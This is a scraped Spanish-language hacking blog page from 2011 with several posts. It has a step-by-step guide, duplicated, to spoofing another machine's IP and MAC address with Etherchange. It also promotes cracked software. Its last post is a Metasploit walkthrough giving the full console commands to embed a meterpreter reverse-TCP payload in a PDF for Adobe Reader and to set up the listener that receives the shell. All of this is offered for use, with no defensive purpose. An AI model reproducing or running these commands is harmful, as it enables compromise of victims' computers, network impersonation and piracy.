la pagina web de la comunidad de truzone  entra al foro y aporta en la comunidad de truzone  descarga programas gratis desde la pagina de la comunidad de truzone  conoce  a todo el clan y staff de la comunidad de truzone  recomienda a tus amigos y familiares la web y comunidad de truzone  contacta al dueño de la comunidad de truzone  

lunes, 28 de noviembre de 2011

9 Best Joomla 1.5 Templates



Spoofing en Windows

Objetivo: Suplantar Dirección IP y MAC

Preparación:

Una maquina con Windows
Conexión a Red
Tener una máquina para spoofearla.

Herramientas:
Símbolo del Sistema
Etherchange.exe

Guía:

1) Abrimos un símbolo del Sistema y escribimos el siguiente comando Ipconfig /all > nombreArchivo.txt o si solo queremos ver la configuración y no guardarla en un archivo .txt solo damos Ipconfig /all

Ipconfig /all= Esta nos muestra la configuración completa de las tarjetas de red, nos muestra puerta de enlace, servidor DNS primario y secundario, configuración Proxy, etc.



2) Vamos al directorio en mi caso C:\Documents and Settings\avanzado, y miramos que nuestro archivo red.txt este en el directorio, esta seria la configuración de nuestra maquina.



3)
Ahora descargamos la herramienta Etherchange.exe desde http://www.ntsecurity.nu/downloads/etherchange.exe



4) Después de haber descargado Etherchange.exe lo copian al directorio en mi caso C:\Documents and Settings\avanzado para ejecutarlo desde el símbolo de sistema. Y damos la opción número 1




5) En la siguiente opción también le damos la numero 1, para poner la MAC de la otra maquina y así suplantarla o spoofearla. La dirección MAC de la otra maquina ustedes ya la tienen que tener, la ponemos sin separaciones ni nada.
Ejemplo: 00218574D5CD




6) Después de ponerla nos arroja un mensaje de que esa es nuestra nueva dirección Ethernet.



7) Si tenemos habilitado el DHCP debería también tomarnos la IP de la maquina a spoofear, si la tenemos estática la tendremos que cambiar a DHCP.

8) Ahora desactivamos y activamos el adaptador de red que estemos utilizando.




9) Como podrán observar desde un principio mi MAC y mi IP eran estas. Pero,gracias al Etherchange las cambie.


10) Ahora ejecutamos ipconfig /all para verificar que ya estamos navegando con la MAC y la IP de la maquina spoofeada.



Y listoo
Fuente: blackploit y portalhacker

Spoofing en Windows

Objetivo: Suplantar Dirección IP y MAC

Preparación:

Una maquina con Windows
Conexión a Red
Tener una máquina para spoofearla.

Herramientas:
Símbolo del Sistema
Etherchange.exe

Guía:

1) Abrimos un símbolo del Sistema y escribimos el siguiente comando Ipconfig /all > nombreArchivo.txt o si solo queremos ver la configuración y no guardarla en un archivo .txt solo damos Ipconfig /all

Ipconfig /all= Esta nos muestra la configuración completa de las tarjetas de red, nos muestra puerta de enlace, servidor DNS primario y secundario, configuración Proxy, etc.



2) Vamos al directorio en mi caso C:\Documents and Settings\avanzado, y miramos que nuestro archivo red.txt este en el directorio, esta seria la configuración de nuestra maquina.



3)
Ahora descargamos la herramienta Etherchange.exe desde http://www.ntsecurity.nu/downloads/etherchange.exe



4) Después de haber descargado Etherchange.exe lo copian al directorio en mi caso C:\Documents and Settings\avanzado para ejecutarlo desde el símbolo de sistema. Y damos la opción número 1




5) En la siguiente opción también le damos la numero 1, para poner la MAC de la otra maquina y así suplantarla o spoofearla. La dirección MAC de la otra maquina ustedes ya la tienen que tener, la ponemos sin separaciones ni nada.
Ejemplo: 00218574D5CD




6) Después de ponerla nos arroja un mensaje de que esa es nuestra nueva dirección Ethernet.



7) Si tenemos habilitado el DHCP debería también tomarnos la IP de la maquina a spoofear, si la tenemos estática la tendremos que cambiar a DHCP.

8) Ahora desactivamos y activamos el adaptador de red que estemos utilizando.




9) Como podrán observar desde un principio mi MAC y mi IP eran estas. Pero,gracias al Etherchange las cambie.


10) Ahora ejecutamos ipconfig /all para verificar que ya estamos navegando con la MAC y la IP de la maquina spoofeada.



Y listoo
Fuente: blackploit y portalhacker

Video Spin Blaster – Cracked



Video Spin Blaster – Cracked

Todos sabemos que si quieres hacer la comercialización de vídeo, la masa es la palabra clave. La creación de videos con el software tradicional no es sólo ineficiente, sino que también es difícil y lento. Aquí es donde Blaster Vídeo Giro entra en escena El propósito del alma de este Video Creator Misa es la generación de vídeos sobre la marcha, con solo presionar un botón del ratón. Todo lo que necesitas hacer es descargar algunas imágenes y que son buenos para ir. Gira de vídeo Blaster fue diseñado para ser fácil de usar. Por modifing algunas opciones que usted puede comenzar a generar toneladas de videos en cuestión de segundos






Metasploit - HTTP Client Automatic Exploiter


Metasploit - HTTP Client Automatic Exploiter


Infectar PDF [Video Tutorial]


aqui les dejo un vídeo donde se muestra la manipulación del Metasploit para obtener un PDF malintencionado que al abrirlo devuelve una shell que se conectar al atacante. El exploit mencionado afecta a las versiones de Adobe Reader v8.x, v9.x y a Windows XP SP3(2,1,0). Al final explico cada paso que se llevo a cabo en el vídeo:




Aquí está el comando y entre corchetes [] la explicación

-------------------------------------------------------

Shell - Konsole
use exploit/windows/fileformat/adobe_pdf_embedded_exe [El exploit para ejecutar un el PAYLOAD al abrir un PDF]
set FILENAME nombre_salida.pdf [El nombre que tendrá el PDF una vez modificado por msf]
set INFILENAME /root/nombre_entrada.pdf [El nombre del PDF que será infectado]
set OUTPUTPATH /root/ [Directorio donde se guardará el PDF]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.150.128 [IP que estará a la escucha para que se conecte el PAYLOAD]
set LPORT 4455 [Puerto a la escucha]
set id 0 [El S.O. y la versión del Adobe Reader que vulnera el exploit]
exploit

Ya le dijimos al PDF donde se conectara y en que puerto, ahora hay que poner el MSF a la escucha:

Shell - Konsole
back ["Atrás", dejamos de usar el exploit actual]
use exploit/multi/handler [El exploit para recibir a nuestro PAYLOAD]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.150.128 [IP de nuestra máquina]
set LPORT 4455 [Puerto donde se conectarán]
set id 0 [Definimos los parametros del exploit]
exploit

--------------------------------------------------------------------

fuente : c-intrud3rs.com